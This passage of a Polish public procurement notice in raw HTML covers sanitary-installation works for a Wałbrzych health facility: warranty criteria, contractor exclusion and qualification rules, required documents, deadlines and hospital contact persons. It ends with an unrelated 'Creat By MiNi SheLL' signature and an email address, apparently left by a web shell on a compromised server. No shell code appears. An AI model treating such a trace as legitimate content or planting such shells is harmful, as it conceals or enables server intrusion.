sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji: 24 miesiące – 0 pkt, od 25 do 35 miesięcy – 5 pkt, 36 miesięcy – 20 pkt, od 37 do 47 miesięcy – 25 pkt 48 miesięcy - 40 pkt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>2. nie podlegają wykluczeniu zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Zgodnie z<br/>treścią art. 7 ust. 1 w/w ustawy, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na<br/>podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>3. spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>działalności związanej z przedmiotem niniejszego zamówienia na kwotę min. 100 000,00 zł.<br/>d) zdolności technicznej lub zawodowej:<br/>W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej (112 ust. 2 pkt 4 ustawy) Zamawiający wymaga, aby Wykonawca spełniał minimalne<br/>warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości, poprzez:<br/>- Wykaz robót budowlanych, oraz dowody poświadczające, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy, to w tym okresie, wykonał 2 roboty budowlane, których przedmiotem było wykonanie robót<br/>budowlanych z instalacji sanitarnych, w tym jedna na kwotę 150 000,00 zł wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane.<br/>- Wykaz zawierający wskazanie osoby, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia z instalacji<br/>sanitarnych, przewidzianą do kierowania robotami budowlanymi, skierowanej przez wykonawcę do realizacji zamówienia<br/>publicznego, wraz z informacjami na temat jej kwalifikacji zawodowej, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także informacją o podstawie do dysponowania tą osobą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki<br/>dowodowe na potwierdzenie braku podstaw do wykluczenia zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust.<br/>1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego. Dokumenty do których przekazania zostanie wezwany Wykonawca, którego oferta<br/>zostanie najwyżej oceniona zgodnie z art. 274 ust. 1 ustawy p.z.p.:<br/>1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykaz robót budowlanych, oraz dowody poświadczające, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy, to w tym okresie, wykonał 2 roboty budowlane, których przedmiotem było wykonanie robót budowlanych z instalacji<br/>sanitarnych w tym jedna na kwotę 150 000,00 zł wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których roboty te zostały wykonane, oraz że roboty budowlane wskazane przez Wykonawcę w wykazie zostały wykonane<br/>należycie, w szczególności zawierające informację o tym, czy zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone. Zgodnie z postanowieniami § 9 ust. 1 pkt 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia<br/>23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia, dowodami tymi są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wykonawca nie jest zobowiązany do<br/>przedłożenia dokumentów, które dotyczyłyby zamówień wykonanych na rzecz Zamawiającego.<br/>2. Wykaz zawierający wskazanie osoby, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia z instalacji<br/>sanitarnych, przewidzianą do kierowania robotami budowlanymi, skierowanej przez wykonawcę do realizacji zamówienia<br/>publicznego, wraz z informacjami na temat jej kwalifikacji zawodowej, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także informacją o podstawie do dysponowania tą osobą – stanowi załącznik nr 8.<br/>3.Sytuacja ekonomiczna: na podstawie dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie działalności związanej z przedmiotem niniejszego zamówienia na kwotę min. 100 000,00 zł.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedstawienia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają pełnomocnika do<br/>Ogłoszenie nr 2023/BZP 00121626/01 z dnia 2023-03-06<br/>2023-03-06 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego.<br/>Do oferty wspólnej wykonawcy dołączają pełnomocnictwo.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, że nie podlegają wykluczeniu<br/>zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego oraz spełniają warunki udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o<br/>zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w<br/>zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia.<br/>W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-19 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdrowie_walbrzych</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-19 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Oferta musi zawierać:<br/>1. Wypełniony wzór oferty wraz z formularzem cenowym – załącznik nr 2 do SWZ.<br/>2. Oświadczenie Wykonawcy dotyczące przesłanek wykluczenia art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7<br/>ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz o spełnieniu warunków udziału w postępowaniu,<br/>składane na podstawie art. 125 ust. 1 ustawy Pzp - załącznik nr 4 do SWZ. Jeżeli Wykonawca w celu potwierdzenia<br/>warunków udziału w postępowaniu będzie polegać na zasobach innego podmiotu zgodnie z art.118 Pzp, zobowiązany jest<br/>do złożenia wraz z ofertą oświadczenia podmiotu udostępniającego zasoby (załącznik 4a) o braku podstaw wykluczenia<br/>tego podmiotu, które zostały przewidziane względem Wykonawcy – załącznik nr 4a (złożyć, jeżeli dotyczy).<br/>3. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art.117 ust.4<br/>ustawy Pzp - stanowi załącznik nr 5 do SWZ – złożyć jeżeli dotyczy Konsorcjum lub Spółki Cywilnej.<br/>4. Zobowiązanie podmiotu udostępniającego zasoby składane na podstawie art. 118 ust. 3 ustawy Pzp - stanowi załącznik<br/>nr 6 do SWZ – złożyć jeżeli dotyczy.<br/>5. Tabela podwykonawcy – załącznik nr 7 do SWZ – złożyć jeżeli dotyczy<br/>6. Oświadczenie o dokonaniu wizji - stanowi załącznik nr 9 do SWZ<br/><br/>Wymagane jest przeprowadzenie wizji lokalnej<br/>1) Wizja lokalna winna być przeprowadzona przed upływem terminu zadawania pytań.<br/>2) Termin przeprowadzenia wizji po jego wcześniejszym uzgodnieniu – nie później niż 48 h od zgłoszenia.<br/>Osoby do kontaktu z Wykonawcami:<br/>Zygmunt Borsuk - Kierownik Działu Obsługi Szpitala - tel.603332907; (74) 6489726<br/>Zdzisław Marciniak – Z-ca Kierownika Działu Obsługi Szpitala – tel. 504190886

Creat By MiNi SheLL
Email: jattceo@gmail.com